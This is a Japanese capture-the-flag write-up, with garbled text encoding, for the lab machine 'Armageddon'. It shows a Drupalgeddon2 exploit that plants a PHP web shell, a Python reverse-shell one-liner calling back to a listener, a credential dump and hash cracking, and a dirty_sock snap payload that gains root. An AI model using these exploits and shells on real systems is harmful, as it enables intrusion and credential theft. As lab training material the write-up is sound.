åµå¯Ÿï¼ã‚¹ã‚ャン
nmapã§ã‚¹ã‚ャンã—ã¾ã™ã€‚
┌──(kali㉿kali)-[~] └─$ nmap -T4 -P0 -sC -sV -A -p- 10.10.10.233 Starting Nmap 7.92 ( https://nmap.org ) Nmap scan report for 10.10.10.233 Host is up (0.23s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT  STATE SERVICE VERSION 22/tcp open ssh    OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: |  2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) |  256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http   Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-generator: Drupal 7 (http://drupal.org) |_http-title: Welcome to Armageddon | Armageddon |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
Â
ãªãŠã€droopescanã§ã¯ãƒãƒ¼ã‚¸ãƒ§ãƒ³ãŒ7.56ã§ã‚ã‚‹ã“ã¨ãŒã‚ã‹ã‚Šã¾ã™ã€‚
┌──(kali㉿kali)-[~/droopescan] └─$ ./droopescan scan drupal -u http://10.10.10.233                                                         [+] Plugins found:                                                                 profile http://10.10.10.233/modules/profile/    php http://10.10.10.233/modules/php/    image http://10.10.10.233/modules/image/ [+] Themes found:    seven http://10.10.10.233/themes/seven/    garland http://10.10.10.233/themes/garland/
[+] Possible version(s): Â Â Â 7.56 [+] Possible interesting urls found: Â Â Â Default changelog file - http://10.10.10.233/CHANGELOG.txt
※補足:droopescanã®ã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«
git clone https://github.com/droope/droopescan.git cd droopescan pip install -r requirements.txt
Hack The Boxã§ã¯åå‰ãŒãƒ’ントã«ãªã£ã¦ã„ã‚‹ã“ã¨ãŒã‚ã‚Šã¾ã™ãŒã€Drupalã®Exploitを検索ã™ã‚‹ã¨ä»Šå›žã®ãƒãƒ¼ã‚¸ãƒ§ãƒ³ãŒè©²å½“ã™ã‚‹è„†å¼±æ€§ãŒè¦‹ã¤ã‹ã‚Šã¾ã—ãŸã€‚
┌──(kali㉿kali)-[~] └─$ searchsploit drupal ------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------- --------------------------------- Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Â
å‚考:CVE-2018-7600(Drupalgeddon2)
https://www.mbsd.jp/Whitepaper/CVE-2018-7600.pdf
Â
アクセスå–å¾—
上記ã®exploitを実行ã—ã¦ã¿ã¾ã™ã€‚
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 44449
Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
URL: https://www.exploit-db.com/exploits/44449
Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text
Copied to: /home/kali/44449.rb
┌──(kali㉿kali)-[~]
└─$ ruby 44449.rb http://10.10.10.233
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo YLCIJKNM
[+] Result : YLCIJKNM
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> whoami
apache
Â
「apacheã€ã®ãƒ¦ãƒ¼ã‚¶ã§ã‚¢ã‚¯ã‚»ã‚¹ãŒå–å¾—ã§ãã¾ã—ãŸã€‚
※実行時ã«ä»¥ä¸‹ã®ã‚ˆã†ãªã‚¨ãƒ©ãƒ¼ãŒå‡ºã‚‹å ´åˆã¯å¿…è¦ãªãƒ‘ッケージãŒã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«ã•ã‚Œã¦ã„ãªã„å ´åˆãŒã‚ã‚‹ãŸã‚ã€ã€Œsudo gem install highlineã€å®Ÿè¡Œã§ä¾å˜é–¢ä¿‚ã®å•é¡Œã‚’解消ã§ãã‚‹ã¾ã™ã€‚
highline/import (LoadError)
Â
ã“ã®ã‚¨ã‚¯ã‚¹ãƒ—ãƒã‚¤ãƒˆã§ã¯ã€ãƒ‡ã‚£ãƒ¬ã‚¯ãƒˆãƒªç§»å‹•ãªã©ãŒã§ããªã‹ã£ãŸãŸã‚ã€Pythonã§ã‚·ã‚§ãƒ«ã‚’å–å¾—ã—ã¾ã™ã€‚
å–å¾—ã—ãŸã‚¿ãƒ¼ãƒŸãƒŠãƒ«ã§å®Ÿè¡Œ
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Kaliã®å¾…ã¡å—㑠┌──(kali㉿kali)-[~] └─$ sudo nc -nvlp 4444 148 ⨯ 1 âš™ listening on [any] 4444 ... connect to [10.10.16.5] from (UNKNOWN) [10.10.10.233] 43634 sh: no job control in this shell sh-4.2$ export PS1="[\u@\t \w]\$ " export PS1="[\u@\t \w]\$ " [apache@01:46:36 /var/www/html]$
Â
ç‰¹æ¨©æ˜‡æ ¼
Drupalã¯/sites/default/settings.phpã«ãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã®æŽ¥ç¶šæƒ…å ±ç‰ãŒã‚るよã†ã§ã™ã€‚
Â
mysqlã®æŽ¥ç¶šæƒ…å ±ãŒè¦‹ã‚Œã¾ã—ãŸã€‚
上記ã®æƒ…å ±ã‚’ä½¿ã£ã¦ã€MySQL内ã®ãƒ¦ãƒ¼ã‚¶æƒ…å ±ã‚’è¦‹ã¦ã¿ã¾ã™ã€‚
[apache@02:07:53 /var/www/html/sites/default]$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;' <-u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;' Tables_in_drupal actions authmap batch block block_custom block_node_type block_role blocked_ips cache cache_block cache_bootstrap cache_field cache_filter cache_form cache_image cache_menu cache_page cache_path comment date_format_locale date_format_type date_formats field_config field_config_instance field_data_body field_data_comment_body field_data_field_image field_data_field_tags field_revision_body field_revision_comment_body field_revision_field_image field_revision_field_tags file_managed file_usage filter filter_format flood history image_effects image_styles menu_custom menu_links menu_router node node_access node_comment_statistics node_revision node_type queue rdf_mapping registry registry_file role role_permission search_dataset search_index search_node_links search_total semaphore sequences sessions shortcut_set shortcut_set_users system taxonomy_index taxonomy_term_data taxonomy_term_hierarchy taxonomy_vocabulary url_alias users users_roles variable watchdog
ã•ã‚‰ã«ã€Œusersã€ã®ä¸èº«ã‚’見ã¦ã¿ã‚‹ã¨ã€ã€Œbrucetherealadminã€ã¨ã„ã†ãƒ¦ãƒ¼ã‚¶ãŒã„ã‚‹ã“ã¨ãŒç¢ºèªã§ãã¾ã—ãŸã€‚
[apache@02:21:11 /var/www/html/sites/default]$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select * from users;' <-u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select * from users;' uid name pass mail theme signature signature_format created access login status timezone language picture init data 0 NULL 0 0 0 0 NULL 0 NULL 1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt [email protected] filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 [email protected] a:1:{s:7:"overlay";i:1;}
ã“ã®ãƒ¦ãƒ¼ã‚¶ã¯ãƒãƒ¼ã‚«ãƒ«ã«ã‚‚å˜åœ¨ã™ã‚‹ã‚ˆã†ã§ã™ã€‚
[apache@02:29:40 /home]$ ls ./brucetherealadmin ls ./brucetherealadmin ls: cannot open directory ./brucetherealadmin: Permission denied [apache@02:35:55 /home]$ ls /home/bruce ls /home/bruce ls: cannot access /home/bruce: No such file or directory
brucetherealadminã®ãƒ‘スワードを解æžã—ã¦ã¿ã¾ã™ã€‚
┌──(kali㉿kali)-[~] └─$ john --wordlist=./rockyou.txt pwd Created directory: /home/kali/.john Using default input encoding: UTF-8 Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status booboo (?) 1g 0:00:00:00 DONE (2022-08-22 23:26) 2.127g/s 510.6p/s 510.6c/s 510.6C/s tiffany..chris Use the "--show" option to display all of the cracked passwords reliably Session completed.
※補足:hashcatã®å ´åˆ
sudo hashcat -m 7900 pwd ./rockyou.txt --force
「brucetherealadminã€ã®ãƒ‘スワードãŒã€Œboobooã€ã§ã‚ã‚‹ã“ã¨ãŒã‚ã‹ã‚Šã¾ã—ãŸã€‚
ã“ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆæƒ…å ±ã§SSH接続ã—ã¦ã¿ã¾ã™ã€‚
上記ユーザã¯snapコマンドを実行ã§ãるよã†ã§ã™ã€‚
「snap privilege escalationã€ç‰ã§æ¤œç´¢ã—ã¦ã¿ã‚‹ã¨ã€Œdirty_sockã€ã¨ã„ã†æƒ…å ±ãŒè¦‹ã¤ã‹ã‚Šã¾ã™ã€‚
上記ã®ã‚³ãƒ¼ãƒ‰ã¯python3ã§å‹•ä½œã™ã‚‹ã‚‚ã®ã§ã€ãã®ã¾ã¾ã§ã¯ä½¿ç”¨ã§ãã¾ã›ã‚“。
ãã®ãŸã‚コードã®ä¸èº«ã‚’一部抜ãå–ã£ã¦ä½¿ç”¨ã—ã¦ã¿ã¾ã™ã€‚
[brucetherealadmin@armageddon ~]$ python --version
Python 2.7.5
[brucetherealadmin@armageddon ~]$ python -c print'"aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw"+ "A" * 4256 + "=="' | base64 --decode > exploit.snap
[brucetherealadmin@armageddon ~]$ ls
army.snap exploit.snap user.txt xxxx_1.0_all.snap
[brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install --dangerous --devmode exploit.snap
dirty-sock 0.1 installed
[brucetherealadmin@armageddon ~]$ tail /etc/passwd
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
dirty_sock:x:1001:1001::/home/dirty_sock:/bin/bash
[brucetherealadmin@armageddon ~]$ su dirty_sock
パスワード:
[dirty_sock@armageddon brucetherealadmin]$ sudo -i
ã‚ãªãŸã¯ã‚·ã‚¹ãƒ†ãƒ 管ç†è€…ã‹ã‚‰é€šå¸¸ã®è¬›ç¿’ã‚’å—ã‘ãŸã¯ãšã§ã™ã€‚
ã“ã‚Œã¯é€šå¸¸ã€ä»¥ä¸‹ã®3点ã«è¦ç´„ã•ã‚Œã¾ã™:
#1) 他人ã®ãƒ—ライãƒã‚·ãƒ¼ã‚’å°Šé‡ã™ã‚‹ã“ã¨ã€‚
#2) タイプã™ã‚‹å‰ã«è€ƒãˆã‚‹ã“ã¨ã€‚
#3) 大ã„ãªã‚‹åŠ›ã«ã¯å¤§ã„ãªã‚‹è²¬ä»»ãŒä¼´ã†ã“ã¨ã€‚
[sudo] dirty_sock ã®ãƒ‘スワード:
[root@armageddon ~]#
rootãŒå–å¾—ã§ãã¾ã—ãŸã€‚
※rootã¾ã§å–å¾—ã‚’ã‚„ã£ã¦ã¿ã¾ã—ãŸãŒã€ä¸Šè¨˜ã®ç‰¹æ¨©æ˜‡æ ¼ã®éƒ¨åˆ†ã¯è‡ªåˆ†ã®ä¸ã§æ•´ç†ã—ãã‚Œã¦ã„ã¾ã›ã‚“。。。
Â
å‚考ã«ã•ã›ã¦ã„ãŸã ã„ãŸã‚µã‚¤ãƒˆ
è²´é‡ãªæƒ…å ±ã‚’ã‚ã‚ŠãŒã¨ã†ã”ã–ã„ã¾ã™ã€‚
Â
